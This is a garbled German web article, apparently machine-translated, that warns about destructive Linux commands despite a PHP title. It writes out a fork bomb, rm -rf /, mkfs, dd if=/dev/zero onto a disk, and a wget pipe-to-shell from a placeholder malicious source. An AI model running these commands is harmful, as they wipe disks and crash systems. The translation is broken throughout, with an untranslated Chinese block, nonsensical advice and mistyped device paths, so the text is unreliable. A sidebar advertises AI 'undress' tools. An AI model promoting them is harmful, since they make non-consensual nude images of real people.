9 PHP-Befehle und -Codes, auf die Sie immer achten müssen
Linux-Shell-/Terminal-Befehle sind sehr leistungsfähig, selbst ein einfacher Befehl kann dazu führen, dass Ordner, Dateien oder Pfadordner gelöscht werden.
In einigen Fällen fragt Linux Sie nicht einmal danach und führt den Befehl direkt aus, wodurch verschiedene Dateninformationen verloren gehen.
Generell wird neuen Linux-Benutzern empfohlen, diese Befehle im Web auszuführen. Natürlich gibt es auch Leute, die diesen Code geschrieben haben, die das nicht glauben, denn das ist kein Witz mehr du schreibst es auf.
Hier habe ich einige systemschädliche Linux-Codes zusammengestellt, damit Sie sie vermeiden können. Denken Sie daran: Dieser Code ist sehr gefährlich und kann sogar geändert werden, um noch schädlicher zu werden.
Noch etwas zu beachten: Einige Befehle sind nur dann schädlich, wenn sie in Ubuntu das Präfix sudo haben. Andere Linux-Distributionen können schädlich sein, wenn sie als Root-Verzeichnisbefehle verwendet werden.
1. Linux Fork Bomb Command
:(){ :|: & };: Bekannt als Fork Bomb, handelt es sich um einen Denial-of-Service-Angriff auf das Linux-System. :(){ :|: & };: ist eine Bash-Funktion. Solange es ausgeführt wird, wird es wiederholt, bis das System einfriert.
Sie können dieses Problem nur durch einen Neustart des Systems lösen. Seien Sie also unbedingt aufmerksam, wenn Sie diesen Befehl auf der Linux-Schnittstelle ausführen.
2. Mv-Ordner/Dev/Null-Befehl
mv-Ordner/dev/null ist ebenfalls ein gefährlicher Befehl. Dev/Null oder Nullgerät ist eine Gerätedatei, die alle in diese Gerätedatei geschriebenen Daten löscht. Die Eingabeaufforderung für den Vorgang lautet jedoch, dass der Schreibvorgang erfolgreich ausgeführt wurde. Dies ist es, was wir oft als „bit bucked“ oder „schwarzes Loch“ bezeichnen.
3. Rm -Rf-Befehl
Der Befehl rm -rf kann Ordner und deren Inhalte in Linux-Systemen schnell löschen. Wenn Sie nicht wissen, wie man es richtig verwendet, werden Sie nur weinen.
Listen Sie die häufigsten Kombinationen und Auswahlmöglichkeiten von m-rf-Befehlen auf:
rm command :删除Linux系统的文件 rm -f command:不需提示,删除文件中的只读文件 rm -r command 循环删除文件夹的内容 rm -d command :删除空目录,如果非空目录则不会执行该操作 rm -rf/ command:强制删除根目录中的所有内容和子文件夹(包括写保护文件)命令。 rm -rf* command :强制删除当前目录中的所有内容(当前工作目录)和字文件夹 rm -rf. command:强制删除当前文件夹目录/子目录中的所有内容 。同rm -r.[^.]* The rm -r.[^.]* command :删除文件及文件夹,带有删除提示
4. Mkfs-Befehl
Wenn Sie die Funktion von mkfs nicht kennen, dann Es ist auch ein gefährlicher Befehl. Jeder Befehl, der nach mkfs geschrieben wird, wird formatiert und durch ein leeres Linux-Dateisystem ersetzt.
Für die folgenden Befehle sind Administratorrechte erforderlich, um die Festplatte zu formatieren:
mkfs mkfs.ext3 mkfs.bfs mkfs.ext2 mkfs.minix mkfs.msdos mkfs.reiserfs mkfs.vfat
mkfs.cramfs kann das Gleiche wie der obige Code tun, erfordert jedoch keine administrative Quelle Rechte.
5. Tar Bomb
Der tar-Befehl wird verwendet, um mehrere Dateien in einer Datei (Archivdatei) im .tar-Format zusammenzufassen. Eine Tape Archive (Tar)-Bombe kann von ihm erstellt werden.
Bei der Komprimierung ist es diese Archivdatei, die Zehntausende ähnlich benannte Dateien generiert, die im aktuellen Verzeichnis statt in einem neuen Verzeichnis angezeigt werden.
Wenn Sie eine TAR-Datei erhalten, erstellen Sie regelmäßig ein neues geschütztes Verzeichnis und legen Sie die empfangene TAR-Datei dann vor der Dekomprimierung in diesem Verzeichnis ab. So können Sie vermeiden, Opfer einer Teerbombe zu werden.
6. Dd-Befehl
Der Dd-Befehl wird zum Kopieren und Ändern von Festplattenpartitionen verwendet. Wenn Sie es an der falschen Stelle verwenden, kann es gefährlich sein.
Der dd-Befehl ist unten aufgeführt:
dd if=/dev/hda of=/dev/hdb dd if=/dev/hda of=/dev/sdb dd if=something of=/dev/hda dd if=something of=/dev/sda
Der folgende Befehl löscht die gesamte Hauptfestplatte: dd if=/dev/zero of=/dev/had
7. Shell-Skriptcode
Manchmal werden Sie ausgetrickst und erhalten eine Shell-Skriptdatei zum Herunterladen und Ausführen. Das Skript kann schädlichen oder gefährlichen Code enthalten. Die Befehlsform könnte wie folgt aussehen: wget http://some_malicious_source -O- |. wget lädt das Skript herunter, wenn das Skript eingeschränkt wird.
8. Schädlicher Quellcode
Vielleicht gibt Ihnen jemand den Quellcode und lässt Sie ihn kompilieren. Bei dem Code kann es sich um normalen Code handeln, es kann jedoch sein, dass im großen Quellcode bösartiger Code versteckt ist. Wenn dies der Fall ist, ist Ihr System angreifbar. Wie kann man das vermeiden? Akzeptieren und kompilieren Sie Quellcode nur aus vertrauenswürdigen Quellen.
9. Dekompressionsbombe
Sie haben eine komprimierte Datei erhalten und wurden gebeten, diese scheinbar kleine Datei zu extrahieren, möglicherweise nur KB. Tatsächlich enthält die geringe Größe der komprimierten Datei stark komprimierte Daten.
Solange die Datei dekomprimiert ist, werden Hunderte GB an Daten extrahiert. Zu diesem Zeitpunkt ist die Wahrscheinlichkeit sehr hoch, dass übermäßig große Daten die Festplatte füllen und Ausfallzeiten verursachen. Wie kann man das vermeiden? Wie das alte Sprichwort sagt: Seien Sie nicht geizig, akzeptieren Sie Dokumente von vertrauenswürdigen Quellen.

Heiße KI -Werkzeuge

Undresser.AI Undress
KI-gestützte App zum Erstellen realistischer Aktfotos

AI Clothes Remover
Online-KI-Tool zum Entfernen von Kleidung aus Fotos.

Undress AI Tool
Ausziehbilder kostenlos

Clothoff.io
KI-Kleiderentferner

AI Hentai Generator
Erstellen Sie kostenlos Ai Hentai.

Heißer Artikel

Heiße Werkzeuge

Notepad++7.3.1
Einfach zu bedienender und kostenloser Code-Editor

SublimeText3 chinesische Version
Chinesische Version, sehr einfach zu bedienen

Senden Sie Studio 13.0.1
Leistungsstarke integrierte PHP-Entwicklungsumgebung

Dreamweaver CS6
Visuelle Webentwicklungstools

SublimeText3 Mac-Version
Codebearbeitungssoftware auf Gottesniveau (SublimeText3)

Heiße Themen



PHP 8.4 bringt mehrere neue Funktionen, Sicherheitsverbesserungen und Leistungsverbesserungen mit einer beträchtlichen Menge an veralteten und entfernten Funktionen. In dieser Anleitung wird erklärt, wie Sie PHP 8.4 installieren oder auf PHP 8.4 auf Ubuntu, Debian oder deren Derivaten aktualisieren. Obwohl es möglich ist, PHP aus dem Quellcode zu kompilieren, ist die Installation aus einem APT-Repository wie unten erläutert oft schneller und sicherer, da diese Repositorys in Zukunft die neuesten Fehlerbehebungen und Sicherheitsupdates bereitstellen.

Visual Studio Code, auch bekannt als VS Code, ist ein kostenloser Quellcode-Editor – oder eine integrierte Entwicklungsumgebung (IDE) –, die für alle gängigen Betriebssysteme verfügbar ist. Mit einer großen Sammlung von Erweiterungen für viele Programmiersprachen kann VS Code c

Wenn Sie ein erfahrener PHP-Entwickler sind, haben Sie möglicherweise das Gefühl, dass Sie dort waren und dies bereits getan haben. Sie haben eine beträchtliche Anzahl von Anwendungen entwickelt, Millionen von Codezeilen debuggt und eine Reihe von Skripten optimiert, um op zu erreichen

Dieses Tutorial zeigt, wie XML -Dokumente mit PHP effizient verarbeitet werden. XML (Extensible Markup-Sprache) ist eine vielseitige textbasierte Markup-Sprache, die sowohl für die Lesbarkeit des Menschen als auch für die Analyse von Maschinen entwickelt wurde. Es wird üblicherweise für die Datenspeicherung ein verwendet und wird häufig verwendet

JWT ist ein offener Standard, der auf JSON basiert und zur sicheren Übertragung von Informationen zwischen Parteien verwendet wird, hauptsächlich für die Identitätsauthentifizierung und den Informationsaustausch. 1. JWT besteht aus drei Teilen: Header, Nutzlast und Signatur. 2. Das Arbeitsprinzip von JWT enthält drei Schritte: Generierung von JWT, Überprüfung von JWT und Parsingnayload. 3. Bei Verwendung von JWT zur Authentifizierung in PHP kann JWT generiert und überprüft werden, und die Funktionen und Berechtigungsinformationen der Benutzer können in die erweiterte Verwendung aufgenommen werden. 4. Häufige Fehler sind Signaturüberprüfungsfehler, Token -Ablauf und übergroße Nutzlast. Zu Debugging -Fähigkeiten gehört die Verwendung von Debugging -Tools und Protokollierung. 5. Leistungsoptimierung und Best Practices umfassen die Verwendung geeigneter Signaturalgorithmen, das Einstellen von Gültigkeitsperioden angemessen.

Eine Zeichenfolge ist eine Folge von Zeichen, einschließlich Buchstaben, Zahlen und Symbolen. In diesem Tutorial wird lernen, wie Sie die Anzahl der Vokale in einer bestimmten Zeichenfolge in PHP unter Verwendung verschiedener Methoden berechnen. Die Vokale auf Englisch sind a, e, i, o, u und sie können Großbuchstaben oder Kleinbuchstaben sein. Was ist ein Vokal? Vokale sind alphabetische Zeichen, die eine spezifische Aussprache darstellen. Es gibt fünf Vokale in Englisch, einschließlich Großbuchstaben und Kleinbuchstaben: a, e, ich, o, u Beispiel 1 Eingabe: String = "TutorialPoint" Ausgabe: 6 erklären Die Vokale in der String "TutorialPoint" sind u, o, i, a, o, ich. Insgesamt gibt es 6 Yuan

Statische Bindung (statisch: :) implementiert die späte statische Bindung (LSB) in PHP, sodass das Aufrufen von Klassen in statischen Kontexten anstatt Klassen zu definieren. 1) Der Analyseprozess wird zur Laufzeit durchgeführt.

Was sind die magischen Methoden von PHP? Zu den magischen Methoden von PHP gehören: 1. \ _ \ _ Konstrukt, verwendet, um Objekte zu initialisieren; 2. \ _ \ _ Destruct, verwendet zur Reinigung von Ressourcen; 3. \ _ \ _ Call, behandeln Sie nicht existierende Methodenaufrufe; 4. \ _ \ _ GET, Implementieren Sie den dynamischen Attributzugriff; 5. \ _ \ _ Setzen Sie dynamische Attributeinstellungen. Diese Methoden werden in bestimmten Situationen automatisch aufgerufen, wodurch die Code -Flexibilität und -Effizienz verbessert werden.
